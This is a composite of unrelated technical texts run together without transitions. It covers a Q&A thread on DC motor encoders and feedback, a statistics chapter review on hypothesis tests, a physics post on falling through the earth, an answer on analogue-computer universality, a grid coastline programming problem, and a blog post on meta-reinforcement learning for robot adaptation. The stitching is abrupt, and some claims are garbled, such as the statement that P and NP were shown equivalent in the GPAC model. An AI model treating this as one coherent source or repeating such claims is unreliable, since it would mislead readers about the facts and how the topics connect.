My question is: what is the difference between a DC motor with an encoder and a DC motor without an encoder? As long as I can control the speed of the DC motor using PWM, for example on the Arduino, what is the fundamental difference?
$\begingroup$ Fundamental difference in terms of what? Open loop control, closed loop control, price, construction, etc... $\endgroup$ – Ben ♦ Nov 25, 2016 at 14:37
As @szczepan mentions, the difference is one of feedback.
There are many ways to get feedback regarding the motion of a dc motor. People implementing a control system will often put a mark on the motor's shaft, or attach a "flag" of masking tape, so that they can visually see the turning of the shaft. This helps to ensure the direction of motion is correct (otherwise the dc polarity needs to be reversed). It also helps for observing motion at slow speeds - but is otherwise not appropriate for an automated system.
If you want to automate the observations of the motor's rotation, you must implement some type of sensor that provides appropriate information to the control computer. There are many ways to do this. For example, you can monitor the current being consumed by the motor's windings, and use the motor constant $k_\tau$, to infer the torque generated by the motor. This can be related to acceleration of the shaft by using an appropriate dynamic model of the system. This method, however, is not very accurate and is prone to modelling errors and signal noise. This method is similar to you monitoring the PWM output and inferring motion dynamics - neither is robust to changing dynamics of the system. Another approach is to glue a magnet to the shaft, and monitor it with a Hall effect sensor. This will provide a single pulse to the computer for each rotation of the shaft. This is frequently a solution for high-temperature, or dirty, environments (such as in automotive applications). However, often you need finer granularity of the motion. That is where encoders come in.
There are two basic types of encoders: incremental and absolute. They can be further characterized as quadrature, or non-quadrature encoders. A non-quadrature incremental encoder provides a single pulse to the controller for every incremental motion of the motor shaft. As the previous answer makes clear, this position feedback can be interpreted to infer velocity, acceleration, and possibly jerk (although three derivatives of a sensed value are "spikey" in most applications). This type of encoder, however, only provides information when the position changes, and it does not provide any information about the direction of motion. A quadrature encoder provides two pulses, out of phase, that can be used to detect direction also.
An absolute encoder can provide not only the same information as the incremental encoder does, but it also has many more bits of information from which you can know the angular position of the shaft, in addition to detecting the incremental changes in position.
You can make a very simple encoder by using a disc with slots cut into it. Place a light source (such as an LED) on one side of the disc, and a photodetector on the opposite side. You will get one pulse each time a slot passes between the sensor elements. As you can see, the resolution of motion detection is determined by the number of slots in the disc. Encoders are available with many different numbers of pulses per revolution.
I suggest reading a book such as this one if you want to know more about motion metrology:
The fundamental difference is closed-loop feedback. Without an encoder you only know what speed command you sent to the motor, but have no information about the speed it actually has; a lower battery voltage, for example, will decrease your speed. An encoder gives you the ability to measure the motor's position, from which you can calculate speed, and to regulate those parameters, for example with a PID regulator. A usage example is micromouse robots, where odometry is crucial for moving through the maze.
$\begingroup$ The encoder gives you angular position, and speed can be calculated from this. $\endgroup$ – 50k4 Nov 24, 2016 at 8:56
$\begingroup$ @50k4 Not every encoder gives angular position. The AS5040 can measure angular position and speed, while this kind of encoder gives only quadrature output (A and B channels), and measuring the impulse count in a certain time gives angular velocity. $\endgroup$ – Szczepan Nov 24, 2016 at 8:59
$\begingroup$ The link you have provided clearly states (in the title) that it is a rotary position sensor. Every other output (e.g. speed) is computed, not measured. $\endgroup$ – 50k4 Nov 24, 2016 at 9:51
$\begingroup$ Okay, I'll update my answer as soon as I get home. As you said, the AS5040 is a rotary position sensor. $\endgroup$ – Szczepan Nov 24, 2016 at 12:48
$\begingroup$ Encoders are not the only way of closing the loop, for example you can sense changes in back emf (certain model railway controllers do this for DC motors, most 'sensorless' BLDC controllers do this). $\endgroup$ Jul 27, 2017 at 12:07
9.10: Chapter Review
9.1 Null and Alternative Hypotheses
In a hypothesis test, sample data is evaluated in order to arrive at a decision about some type of claim. If certain conditions about the sample are satisfied, then the claim can be evaluated for a population. In a hypothesis test, we:
- Evaluate the null hypothesis, typically denoted with \(H_0\). The null is not rejected unless the hypothesis test shows otherwise. The null statement must always contain some form of equality (=, ≤, or ≥).
- Always write the alternative hypothesis, typically denoted with \(H_a\) or \(H_1\), using not-equal, less-than, or greater-than symbols, i.e., (\(\neq\), <, or >).
- If we reject the null hypothesis, then we can assume there is enough evidence to support the alternative hypothesis.
- Never state that a claim is proven true or false. Keep in mind the underlying fact that hypothesis testing is based on probability laws; therefore, we can talk only in terms of non-absolute certainties.
9.2 Outcomes and the Type I and Type II Errors
In every hypothesis test, the outcomes are dependent on a correct interpretation of the data. Incorrect calculations or misunderstood summary statistics can yield errors that affect the results. A Type I error occurs when a true null hypothesis is rejected. A Type II error occurs when a false null hypothesis is not rejected.
The probabilities of these errors are denoted by the Greek letters \(\alpha\) and \(\beta\), for a Type I and a Type II error respectively. The power of the test, \(1 – \beta\), quantifies the likelihood that a test will yield the correct result of a true alternative hypothesis being accepted. A high power is desirable.
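These definitions can be checked with a quick simulation (an illustrative sketch, not part of the text): repeatedly run a one-sided \(z\)-test at \(\alpha = 0.05\). Under a true null hypothesis, the fraction of rejections estimates \(\alpha\), the Type I error rate; under a false null hypothesis, it estimates the power, \(1 - \beta\).

```python
import random
from statistics import NormalDist

# Monte Carlo sketch: draw many samples of size n with known sigma, run a
# one-sided z-test at alpha = 0.05, and count how often H0: mu = 0 is rejected.
random.seed(0)
alpha, n, sigma, trials = 0.05, 30, 1.0, 2000
z_crit = NormalDist().inv_cdf(1 - alpha)  # critical value, about 1.645

def reject_rate(true_mean, null_mean=0.0):
    rejections = 0
    for _ in range(trials):
        sample = [random.gauss(true_mean, sigma) for _ in range(n)]
        z = (sum(sample) / n - null_mean) / (sigma / n ** 0.5)
        rejections += z > z_crit
    return rejections / trials

print(round(reject_rate(0.0), 3))  # H0 true: rate is close to alpha = 0.05
print(round(reject_rate(0.5), 3))  # H0 false: rate estimates the power, well above alpha
```

The sample size, effect size, and number of trials here are arbitrary choices for illustration; increasing the true mean or the sample size raises the estimated power.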
9.3 Distribution Needed for Hypothesis Testing
In order for a hypothesis test’s results to be generalized to a population, certain requirements must be satisfied.
When testing for a single population mean:
- A Student's \(t\)-test should be used if the data come from a simple random sample, the population is approximately normally distributed (or the sample size is large), and the population standard deviation is unknown.
- The normal test will work if the data come from a simple random sample, the population is approximately normally distributed (or the sample size is large), and the population standard deviation is known.
When testing a single population proportion, use a normal test if the data come from a simple random sample, satisfy the requirements for a binomial distribution, and the mean numbers of successes and failures satisfy the conditions \(np > 5\) and \(nq > 5\), where \(n\) is the sample size, \(p\) is the probability of a success, and \(q\) is the probability of a failure.
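As a sketch of the proportion test just described (illustrative Python with hypothetical numbers), the code below checks the \(np > 5\) and \(nq > 5\) conditions and then computes the \(z\) statistic and a two-sided \(p\)-value:

```python
from math import erf, sqrt

def proportion_z_test(successes, n, p0):
    """One-sample z-test for a proportion; returns (z, two-sided p-value)."""
    q0 = 1 - p0
    if n * p0 <= 5 or n * q0 <= 5:
        raise ValueError("normal approximation not justified: need np > 5 and nq > 5")
    p_hat = successes / n
    z = (p_hat - p0) / sqrt(p0 * q0 / n)
    # standard normal CDF: Phi(x) = (1 + erf(x / sqrt(2))) / 2
    phi = 0.5 * (1 + erf(abs(z) / sqrt(2)))
    return z, 2 * (1 - phi)

# Hypothetical data: 62 successes out of 100 trials, testing H0: p = 0.5
z, p = proportion_z_test(62, 100, 0.5)
print(round(z, 2), round(p, 4))  # z = 2.4, p ~ 0.0164
```

With \(n = 100\) and \(p_0 = 0.5\), both \(np_0 = 50\) and \(nq_0 = 50\) comfortably exceed 5, so the normal approximation applies; for a smaller sample such as \(n = 8\), the function refuses to run the test.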
9.4 Full Hypothesis Test Examples
The hypothesis test itself has an established process. This can be summarized as follows:
- Determine \(H_0\) and \(H_a\). Remember, they are contradictory.
- Determine the random variable.
- Determine the distribution for the test.
- Draw a graph and calculate the test statistic.
- Compare the calculated test statistic with the \(Z\) critical value determined by the level of significance required by the test and make a decision (cannot reject \(H_0\) or cannot accept \(H_0\)), and write a clear conclusion using English sentences.
It's been way too long since my last posting, thanks to a combination of wanting to do some additional research to support the post I was working on and real life interfering.
So in the meantime I thought I’d do a quick post on a question that pops up here and there on the internet as it’s a fun little calculation: What happens (theoretically) if you fall into a hole that goes all the way through the earth?
As usual in introductory physics problems, we make some simplifying assumptions and ignore some practicalities. We’re not going to worry about the heat that would fry you as you descend to the core, we’re not going to worry about the fact that you would smash into the sides of the hole due to the rotation of the earth, and we’re definitely not going to worry about the fact that the earth is not technically a sphere.
Our idealized earth is non-rotating, a perfect sphere, and has the same density throughout. And it doesn't have any of that pesky volcanic activity.
The calculation is pretty simple once you lay the groundwork on two concepts: Simple Harmonic Motion and Gauss’s Law.
Simple Harmonic Motion
Suppose you have a quantity $x$ which obeys the following differential equation:

$$\ddot{x} = -\omega^2 x$$

The general solution to this equation is known to be a sine wave, $x(t) = A\sin(\omega t + \phi)$, where $A$ and $\phi$ are arbitrary constants. Plugging this back into the differential equation:

$$\ddot{x} = -A\omega^2 \sin(\omega t + \phi) = -\omega^2 x$$

so the equation is satisfied: $x$ oscillates sinusoidally with time. Any motion that has this sinusoidal behavior is called simple harmonic motion. If we define $f = \omega/2\pi$, then $f$ is the frequency of the oscillation. For any wave, the period $T$ is the reciprocal of $f$. From this we can conclude that if we have a variable $x$ which obeys a differential equation of the form $\ddot{x} = -\omega^2 x$, then $x$ will undergo simple harmonic motion with period $T = 2\pi/\omega$.

The constants $A$ and $\phi$ are the amplitude and phase, respectively, of the sine wave. The fact that the equation is satisfied no matter what the values of those constants means that the system can have any amplitude and phase.
Example: Mass on a spring
The standard model of a mass on a spring is that there is a constant $k$, called the spring constant, such that if you displace the spring by an amount $x$ from its equilibrium position, the spring pulls back with a force $F = -kx$. The negative sign indicates that the force is opposite to the displacement. If you pull the spring down, the force pulls up and vice versa.

That force acts on the mass $m$ to accelerate it: $F = ma = m\ddot{x}$. And so we see that the mass on the spring follows the equation:

$$\ddot{x} = -\frac{k}{m}x$$

and we can see immediately that this motion meets the conditions for simple harmonic motion with $\omega = \sqrt{k/m}$, and its period is therefore $T = 2\pi\sqrt{m/k}$.
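The period formula can be checked numerically. This sketch (with arbitrary values of $m$ and $k$, chosen for illustration) integrates $m\ddot{x} = -kx$ with semi-implicit Euler steps and measures the time between successive upward zero crossings of $x(t)$:

```python
from math import pi, sqrt

# Integrate m*x'' = -k*x and measure the oscillation period directly.
m, k = 2.0, 8.0                 # illustrative values only
x, v, dt = 1.0, 0.0, 1e-5
t, crossings = 0.0, []
while len(crossings) < 3:
    v += (-k / m * x) * dt      # a = -(k/m) x
    x_new = x + v * dt
    if x <= 0.0 < x_new:        # upward zero crossing
        crossings.append(t)
    x = x_new
    t += dt

measured = crossings[2] - crossings[1]   # time for one full period
print(round(measured, 3), round(2 * pi * sqrt(m / k), 3))
```

The measured period agrees with $2\pi\sqrt{m/k}$ to within the step size of the integrator, regardless of the amplitude, which is exactly the amplitude-independence property of simple harmonic motion.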
Example: Pendulum

If you swing a pendulum out of its equilibrium position by an angle $\theta$, gravity will tend to pull it back down. The component of gravity pulling outward along the string has no effect, as we assume the pendulum isn't free to move in that direction. The component of gravitational force which is perpendicular to the string is $-mg \sin \theta$.

If we set this equal to $ma = m\ddot{s}$ as usual, the $s$ in that equation refers to distance along the arc, $s = L\theta$, where $L$ is the length of the pendulum. So we have the equation

$$mL\ddot{\theta} = -mg\sin\theta$$
Because of the sine, this doesn't at first glance look like it meets the conditions for simple harmonic motion. But for small angles, $\sin\theta \approx \theta$, with $\theta$ in radians. What does "small" mean? As with any approximation in physics, there's no firm definition. It depends on what level of accuracy you need. The smaller the angle, the better the approximation. For introductory physics calculations, $10°$ is often taken as a rule of thumb for "small enough". $10°$ is about $0.175$ radians, and $\sin(0.175) \approx 0.174$, an error of about $0.5\%$.
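The rule-of-thumb numbers are easy to verify with a quick illustrative snippet:

```python
from math import sin, radians

# Compare sin(theta) with theta (in radians) at the 10-degree rule of thumb.
theta = radians(10)
error = abs(sin(theta) - theta) / sin(theta)
print(round(theta, 4), round(sin(theta), 4), f"{100 * error:.2f}%")
```

At $10°$ the relative error is about half a percent; doubling the angle roughly quadruples the error, since the leading correction term in the Taylor series is $\theta^3/6$.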
If we use the small angle approximation, then the equation of motion becomes

$$\ddot{\theta} = -\frac{g}{L}\theta$$

and now we see that $\theta$ does (approximately) follow simple harmonic motion, with period $T = 2\pi\sqrt{L/g}$.
Gauss's Law

The mathematician Carl Friedrich Gauss discovered a very powerful theorem that simplifies many otherwise very difficult calculations. There is a form for the electrostatic force and one for the gravitational force, and it arises from certain mathematical properties these two forces share, most especially that they are both inverse-square-law forces, proportional to $1/r^2$.
The general form for the electric field is this somewhat intimidating notation:

$$\oint_S \vec{E} \cdot d\vec{A} = 4\pi k_e Q$$

This relates an integral of the electric field over a closed surface $S$ to the total charge $Q$ enclosed inside that surface. It doesn't matter what charge is outside, only inside. The constant $k_e$ comes from the electric field of a point charge, $E = k_e q/r^2$.
The analogous result for gravitational fields, where we define the gravitational field of a point mass $m$ to be $g = -Gm/r^2$, is

$$\oint_S \vec{g} \cdot d\vec{A} = -4\pi G M$$

where $M$ is the total mass enclosed by the surface $S$. The minus sign expresses the fact that the gravitational field of a mass points inward (masses attract) while the direction of the electric field from a positive charge is outward.
Note that "electric field" is defined as "force per unit charge", while "gravitational field" is analogously defined as "force per unit mass". But because $F = ma$, "force per unit mass" is simply acceleration.
Gravity Inside the Earth
We don't need to do a complete exploration of Gauss's Law; we only need to cover the case of a uniform sphere, our model of the earth. To calculate the gravitational field at distance $r$ from the center of the earth, we take as the surface $S$ the sphere of radius $r$. The field will be the same at every point on the surface of this sphere, which means the left hand side of Gauss's Law reduces to the field times the area of the sphere: $4\pi r^2 g(r)$.

On the right hand side we have the mass enclosed inside the radius $r$. We'll call this $M(r)$. So

$$4\pi r^2 g(r) = -4\pi G M(r) \qquad\Longrightarrow\qquad g(r) = -\frac{GM(r)}{r^2}$$

The gravitational field at radius $r$ looks like the gravitational field of a point whose mass is $M(r)$, all the mass enclosed by the sphere of radius $r$.

How much mass is that? We are assuming a constant density $\rho$ for the earth, so $M(r)$ is $\rho$ times the volume of the sphere, $\frac{4}{3}\pi r^3$. Thus

$$g(r) = -\frac{G\rho\,\frac{4}{3}\pi r^3}{r^2} = -\frac{4}{3}\pi G\rho\, r$$

Everything on the right besides $r$ is a constant. So this says that the gravitational field at distance $r$ from the center is proportional to $-r$.
Jumping Into the Hole
As we noted above, the gravitational field is simply the acceleration, $g(r) = \ddot{r}$. So the equation above says that $\ddot{r}$ is a negative constant times $r$, which we know means that $r$ will follow simple harmonic motion.

We're almost done, but it will be convenient to put it in terms of different constants. The average density of the earth is equal to total mass over total volume. Using $M_E$ for the total mass of the earth and $R$ for the radius,

$$\rho = \frac{M_E}{\frac{4}{3}\pi R^3} \qquad\Longrightarrow\qquad \ddot{r} = -\frac{GM_E}{R^3}\,r$$

We know that this describes simple harmonic motion, and from the previous analysis we can immediately conclude that the period is $T = 2\pi\sqrt{R^3/(GM_E)}$. Using values of $M_E = 5.972\times10^{24}\,\text{kg}$, $R = 6357\,\text{km}$ (the polar radius, as I think we should drill the hole pole-to-pole to avoid the rotation), and $G = 6.674\times10^{-11}\,\text{N}\,\text{m}^2/\text{kg}^2$, this gives $T \approx 5044$ seconds, which means the one way trip is 2522 seconds or almost exactly 42 minutes.
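For anyone who wants to check the arithmetic, here is the calculation with standard values of the constants (the exact figures below are my choices, consistent with using the polar radius):

```python
from math import pi, sqrt

# Standard constant values (polar radius, per the pole-to-pole hole).
G = 6.674e-11      # gravitational constant, N m^2 / kg^2
M_E = 5.972e24     # mass of the earth, kg
R = 6.357e6        # polar radius of the earth, m

T = 2 * pi * sqrt(R**3 / (G * M_E))   # full oscillation period
print(round(T), "s full period,", round(T / 2), "s one way,",
      round(T / 120, 1), "min one way")
```

Note that the mass and radius only enter through the average density: any uniform planet with the earth's density would give the same 42-minute trip, regardless of its size.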
Fans of Douglas Adams (Hitchhiker’s Guide to the Galaxy) will appreciate the cosmic significance of the number 42.
Conclusion: Ignoring rotation, air drag, and the minor annoyance of core temperatures, if you jump into a hole that goes straight through the earth, you will oscillate from one end of the hole to the other forever, taking 42 minutes to go from one end to the other.
TL;DR: If by "analogue computers" you mean differential analysers, the answer is adders, constant units and integrators. Bournez, Campagnolo, Graça and Hainry have shown in 2006 (paywalled / free reprint) that an idealized model of it allows one to compute all the computable functions in the framework of computable analysis, and this model only needs these 3 kinds of units.
The set of operations you propose (addition, multiplication, subtraction, and division), even completed by the extraction of roots of equations, is by definition not sufficient to compute any transcendental function. Transcendental functions include very common functions, like $\sin$, $\exp$ and $\log$. However, as discussed below, some analogue computer models allow one to compute transcendental functions and, basically, all real functions computable by a Turing machine.
Analogue computing models
As stressed by others, the concept of "universal computation" is less clear for analogue computers than for standard computers, where the different natural notions of computability in different computing models were found equivalent in the 1930s (see the Wikipedia page on the Church–Turing thesis for details).
In order to define such a universality, one should first define a good model for analogue computation, and it is a difficult task, since the model should be idealized and natural enough to be useful, but its idealization should not give unrealistic power to the model. An example of such a good idealization is the infinite tape of Turing machines. The problem with analogue computers comes with real numbers, which could allow one to build unreasonable stuff like the Zeno machine. However, several such models have been proposed and used in the literature (the GPAC is the main subject of this answer, but I try to be complete in the list below, without any hypercomputer):
Power of the GPAC model
In his 1941 paper, Shannon introduced the GPAC to model differential analysers. This model only needs 3 kinds of interconnected units: constant units, adders and integrators (multipliers can be built from integrators and adders).
He showed that the set of functions which it generates is the set of differentially algebraic functions, but excludes the hypertranscendental functions. It means that the $\Gamma$ and $\zeta$ functions, which are Turing-computable, cannot be generated. In other words, no differential analyser will ever have an output $y(t)=\Gamma(t)$, and it seemed for a long time that such an analogue computer is not "universal", since it cannot generate some reasonable computable functions, used by mathematicians.
However, in 2004, Daniel Silva Graça showed that the previous model, based on instantaneous computation, is too restrictive. If one defines the computability of a function $f$ differently, allowing $y(t)$ to converge towards $f(x)$ for an input $x$, then the $\Gamma$ and $\zeta$ functions are computable by a GPAC. Bournez, Campagnolo, Graça and Hainry then showed in 2006 (paywalled / free reprint) that an idealized model of it allows one to compute all the computable functions in the framework of computable analysis.
Bournez, Graça and Pouly then showed in 2013 that these analogue computers can efficiently simulate a Turing machine (p.181 of a big pdf) and, in 2014, that the P and NP complexity classes are equivalent in this model.
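To see how far those three unit types can go, here is a small illustrative simulation (mine, not from the answer): a constant unit ($-1$) and two integrators wired in a feedback loop realize $y'' = -y$, so the circuit generates the transcendental function $\sin(t)$, exactly the kind of function the algebraic operations alone can never produce.

```python
from math import sin

# Euler-discretized stand-in for two continuous-time integrators in a loop.
# The constant unit (-1) feeds -y into the first integrator, whose output y'
# is integrated again to give y.  With y(0) = 0, y'(0) = 1 the loop's output
# tracks sin(t).
dt, t_end = 1e-5, 3.0
y, dy = 0.0, 1.0
t = 0.0
while t < t_end:
    dy += -y * dt   # first integrator: accumulates the constant unit's output
    y += dy * dt    # second integrator: produces the generated function y(t)
    t += dt

print(round(y, 4), round(sin(t_end), 4))
```

The discretization step and end time here are arbitrary; the point is that three elementary unit types suffice to generate a function that no finite combination of field operations can express.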
The island municipality of Soteholm is required to write a plan of action for their work with emission of greenhouse gases. They realize that a natural first step is to decide whether they are for or against global warming. For this purpose they have read the IPCC report on climate change and found out that the largest effect on their municipality could be the rising sea level.
The residents of Soteholm value their coast highly and therefore want to maximize its total length. For them to be able to make an informed decision on their position in the issue of global warming, you have to help them find out whether their coastal line will shrink or expand if the sea level rises. From height maps they have figured out what parts of their islands will be covered by water, under the different scenarios described in the IPCC report, but they need your help to calculate the length of the coastal lines.
You will be given a map of Soteholm as an $N\times M$ grid. Each square in the grid has a side length of 1 km and is either water or land. Your goal is to compute the total length of sea coast of all islands. Sea coast is all borders between land and sea, and sea is any water connected to an edge of the map only through water. Two squares are connected if they share an edge. You may assume that the map is surrounded by sea. Lakes and islands in lakes are not contributing to the sea coast.
The first line of the input contains two space separated integers $N$ and $M$ where $1\leq N,M\leq 1000$. The following $N$ lines each contain a string of length $M$ consisting of only zeros and ones. Zero means water and one means land.
Output one line with one integer, the total length of the coast in km.
Sample Input 1:

5 6
011110
010110
111000
000010
000000

Sample Output 1:

20
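One straightforward way to solve the problem (an illustrative sketch, not an official solution) is to flood-fill the sea inward from the map border, then count every edge between a land square and a sea square, treating the map boundary itself as sea:

```python
from collections import deque

def coast_length(grid):
    """Total sea-coast length of a grid of '0' (water) / '1' (land) rows."""
    n, m = len(grid), len(grid[0])
    sea = [[False] * m for _ in range(n)]
    q = deque()
    # Seed the flood fill with every water square on the border of the map.
    for r in range(n):
        for c in range(m):
            if grid[r][c] == "0" and (r in (0, n - 1) or c in (0, m - 1)):
                sea[r][c] = True
                q.append((r, c))
    while q:  # BFS: water reachable from the border is sea; the rest is lakes
        r, c = q.popleft()
        for dr, dc in ((1, 0), (-1, 0), (0, 1), (0, -1)):
            nr, nc = r + dr, c + dc
            if 0 <= nr < n and 0 <= nc < m and grid[nr][nc] == "0" and not sea[nr][nc]:
                sea[nr][nc] = True
                q.append((nr, nc))
    total = 0
    for r in range(n):
        for c in range(m):
            if grid[r][c] == "1":
                for dr, dc in ((1, 0), (-1, 0), (0, 1), (0, -1)):
                    nr, nc = r + dr, c + dc
                    # Map edges count as sea, since the map is surrounded by sea.
                    if not (0 <= nr < n and 0 <= nc < m) or sea[nr][nc]:
                        total += 1
    return total

print(coast_length(["011110", "010110", "111000", "000010", "000000"]))  # 20
```

The enclosed water square in the sample is a lake, so its four borders with land are correctly excluded. Both passes are linear in the grid size, comfortably within limits for a 1000 by 1000 map.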
By Anusha Nagabandi and Ignasi Clavera
Humans have the ability to seamlessly adapt to changes in their environments: adults can learn to walk on crutches in just a few seconds, people can adapt almost instantaneously to picking up an object that is unexpectedly heavy, and children who can walk on flat ground can quickly adapt their gait to walk uphill without having to relearn how to walk. This adaptation is critical for functioning in the real world.
Robots, on the other hand, are typically deployed with a fixed behavior (be it hard-coded or learned), allowing them succeed in specific settings, but leading to failure in others: experiencing a system malfunction, encountering a new terrain or environment changes such as wind, or needing to cope with a payload or other unexpected perturbations. The idea behind our latest research is that the mismatch between predicted and observed recent states should inform the robot to update its model into one that more accurately describes the current situation. Noticing our car skidding on the road, for example, informs us that our actions are having a different effect than expected, and thus allows us to plan our consequent actions accordingly (Fig. 2). In order for our robots to be successful in the real world, it is critical that they have this ability to use their past experience to quickly and flexibly adapt. To this effect, we developed a model-based meta-reinforcement learning algorithm capable of fast adaptation.
Figure 2: The driver normally makes decisions based on his/her model of the world. Suddenly encountering a slippery road, however, leads to unexpected skidding. Online adaptation of the driver’s world model based on just a few of these observations of model mismatch allows for fast recovery.
Prior work has used (a) trial-and-error adaptation approaches (Cully et al., 2015) as well as (b) model-free meta-RL approaches (Wang et al., 2016; Finn et al., 2017) to enable agents to adapt after a handful of trials. However, our work takes this adaptation ability to the extreme. Rather than adaptation requiring a few episodes of experience under the new settings, our adaptation happens online on the scale of just a few timesteps (i.e., milliseconds): so fast that it can hardly be noticed.
We achieve this fast adaptation through the use of meta-learning (discussed below) in a model-based learning setup. In the model-based setting, rather than adapting based on the rewards that are achieved during rollouts, data for updating the model is readily available at every timestep in the form of model prediction errors on recent experiences. This model-based approach enables the robot to meaningfully update the model using only a small amount of recent data.
Fig 3. The agent uses recent experience to fine-tune the prior model into an adapted one, which the planner then uses to perform its action selection. Note that we omit details of the update rule in this post, but we experiment with two such options in our work.
Our method follows the general formulation shown in Fig. 3 of using observations from recent data to perform adaptation of a model, and it is analogous to the overall framework of adaptive control (Sastry and Isidori, 1989; Åström and Wittenmark, 2013). The real challenge here, however, is how to successfully enable model adaptation when the models are complex, nonlinear, high-capacity function approximators (i.e., neural networks). Naively implementing SGD on the model weights is not effective, as neural networks require much larger amounts of data in order to perform meaningful learning.
Thus, we enable fast adaptation at test time by explicitly training with this adaptation objective during (meta-)training time, as explained in the following section. Once we meta-train across data from various settings in order to get this prior model (with weights denoted as $\theta$) that is good at adaptation, the robot can then adapt from this at each time step (Fig. 3) by using this prior in conjunction with recent experience to fine-tune its model to the current setting at hand, thus allowing for fast online adaptation.
At any given time step $t$, we are in state $s_t$, we take action $a_t$, and we end up in some resulting state $s_{t+1}$ according to the underlying dynamics function $s_{t+1} = f(s_t, a_t)$. The true dynamics are unknown to us, so we instead want to fit some learned dynamics model $\hat{f}_\theta$ that makes predictions as well as possible on observed data points of the form $(s_t, a_t, s_{t+1})$. Our planner can use this estimated dynamics model in order to perform action selection.
Assuming that any detail or setting could have changed at any time step along the rollout, we consider temporally-close time steps as being able to inform us about the “task” details of our current situation: operating in different parts of the state space, enduring disturbances, attempting new goals/reward, experiencing a system malfunction, etc. Thus, in order for our model to be the most useful for planning, we want to first update it using our recently observed data.
At training time (Fig. 4), what this amounts to is selecting a consecutive sequence of $(M+K)$ data points, using the first $M$ to update our model weights from $\theta$ to $\theta'$, and then optimizing for this new $\theta'$ to be good at predicting the state transitions for the next $K$ time steps. This newly formulated loss function represents prediction error on the future $K$ points, after adapting the weights using information from the past $M$ points:

$$\min_\theta \; \mathbb{E}\!\left[\mathcal{L}\big(\tau_{t:t+K},\, \theta'\big)\right] \quad \text{where} \quad \theta' = u\big(\tau_{t-M:t},\, \theta\big)$$

Here $\tau_{a:b}$ denotes the trajectory segment between time steps $a$ and $b$, and $u$ is the update rule; in the gradient-based version of our method, $u$ is a gradient step on the past $M$ points.
In other words, $\theta$ does not need to result in good dynamics predictions. Instead, $\theta$ needs to be such that it can use task-specific (i.e. recent) data points to quickly adapt itself into new weights $\theta'$ that do result in good dynamics predictions. See the MAML blog post for more intuition on this formulation.
Fig 4. Meta-training procedure for obtaining a $\theta$ such that the adaptation of $\theta$ using the past $M$ timesteps of experience produces a model that performs well for the future $K$ timesteps.
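As a toy illustration of this objective (my sketch, not the paper's implementation), consider a scalar dynamics model $s_{t+1} = \theta s_t$ where each "task" has a different true slope. The inner update adapts $\theta$ on the $M$ most recent points, and meta-training tunes the prior $\theta$ so that one such adaptation step predicts the following $K$ points well; for simplicity the outer gradient is taken by finite differences:

```python
import random

random.seed(1)
M, K, inner_lr, meta_lr = 5, 5, 0.5, 0.01

def make_task():
    """A task = transitions from s' = slope * s with a task-specific slope."""
    slope = random.uniform(0.5, 1.5)
    xs = [random.uniform(-1, 1) for _ in range(M + K)]
    return [(x, slope * x) for x in xs]

def loss_grad(theta, data):
    """Mean squared prediction error and its derivative w.r.t. theta."""
    errs = [theta * s - s_next for s, s_next in data]
    loss = sum(e * e for e in errs) / len(errs)
    grad = sum(2 * e * s for e, (s, _) in zip(errs, data)) / len(errs)
    return loss, grad

def adapted(theta, task):
    """Inner update: one gradient step on the M most recent points."""
    _, g = loss_grad(theta, task[:M])
    return theta - inner_lr * g

theta = 0.0
for _ in range(3000):  # meta-training loop over freshly sampled tasks
    task = make_task()
    eps = 1e-4
    f = lambda th: loss_grad(adapted(th, task), task[M:])[0]
    theta -= meta_lr * (f(theta + eps) - f(theta - eps)) / (2 * eps)

test_task = make_task()
pre, _ = loss_grad(theta, test_task[M:])                 # prior, no adaptation
post, _ = loss_grad(adapted(theta, test_task), test_task[M:])
print(round(theta, 2), round(pre, 4), round(post, 4))    # adaptation lowers the error
```

All of the constants here are illustrative. The learned prior settles near the middle of the task distribution, and a single inner gradient step on recent data then pulls the model toward whatever slope the current task actually has, which is the essence of the meta-objective above.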
We conducted experiments on simulated robotic systems to test the ability of our method to adapt to sudden changes in the environment, as well as to generalize beyond the training environments. Note that we meta-trained all agents on some distribution of tasks/environments (see paper for details), but we then evaluated their adaptation ability on unseen and changing environments at test time. Figure 5 shows a cheetah robot that was trained on piers of varying random buoyancy, and then tested on a pier with sections of varying buoyancy in the water. This environment demonstrates the need for not only adaptation, but for fast/online adaptation. Figure 6 also demonstrates the need for online adaptation by showing an ant robot that was trained with different crippled legs, but tested on an unseen leg failure occurring part-way through a rollout. In these qualitative results below, we compare our gradient-based adaptive learner (‘GrBAL’) to a standard model-based learner (‘MB’) that was trained on the same variation of training tasks but has no explicit mechanism for adaptation.
Fig 5. Cheetah: Both methods are trained on piers of varying buoyancy. Ours is able to perform fast online adaptation at run-time to cope with changing buoyancy over the course of a new pier.
Fig 6. Ant: Both methods are trained on different joints being crippled. Ours is able to use its recent experiences to adapt its knowledge and cope with an unexpected and new malfunction in the form of a crippled leg (for a leg that was never seen as crippled during training).
The fast adaptation capabilities of this model-based meta-RL method allow our simulated robotic systems to attain substantial improvement in performance and/or sample efficiency over prior state-of-the-art methods, as well as over ablations of this method with the choice of yes/no online adaptation, yes/no meta-training, and yes/no dynamics model. Please refer to our paper for these quantitative comparisons.
Fig 7. Our real dynamic legged millirobot, on which we successfully employ our model-based meta-reinforcement learning algorithm to enable online adaptation to disturbances and new settings such as traversing a slippery slope, accommodating payloads, accounting for pose miscalibration errors, and adjusting to a missing leg.
To highlight not only the sample efficiency of our meta reinforcement learning approach, but also the importance of fast online adaptation in the real world, we demonstrate our approach on a real dynamic legged millirobot (see Fig 7). This small 6-legged robot presents a modeling and control challenge in the form of highly stochastic and dynamic movement. This robot is an excellent candidate for online adaptation for many reasons: the rapid manufacturing techniques and numerous custom-design steps used to construct this robot make it impossible to reproduce the same dynamics each time, its linkages and other body parts deteriorate over time, and it moves very quickly and dynamically as a function of its terrain.
We meta-train this legged robot on various terrains, and we then test the agent's learned ability to adapt online to new tasks (at run-time) including a missing leg, novel slippery terrains and slopes, miscalibration or errors in pose estimation, and new payloads to be pulled. Our hardware experiments compare our method to (a) standard model-based learning ('MB'), with neither adaptation nor meta-learning, as well as (b) a dynamic evaluation ('MB+DE') comparison having adaptation, but performing the adaptation from a non-meta-learned prior. These results (Fig. 8-10) show the need for not only adaptation, but adaptation from an explicitly meta-learned prior.
Fig 8. Missing leg.
Fig 9. Payload.
Fig 10. Miscalibrated Pose.
By effectively adapting online, our method prevents drift from a missing leg, prevents sliding sideways down a slope, accounts for pose miscalibration errors, and adjusts to pulling payloads. Note that these tasks/environments share enough commonalities with the locomotion behaviors learned during the meta-training phase such that it would be useful to draw from that prior knowledge (rather than learn from scratch), but they are different enough that they do require effective online adaptation for success.
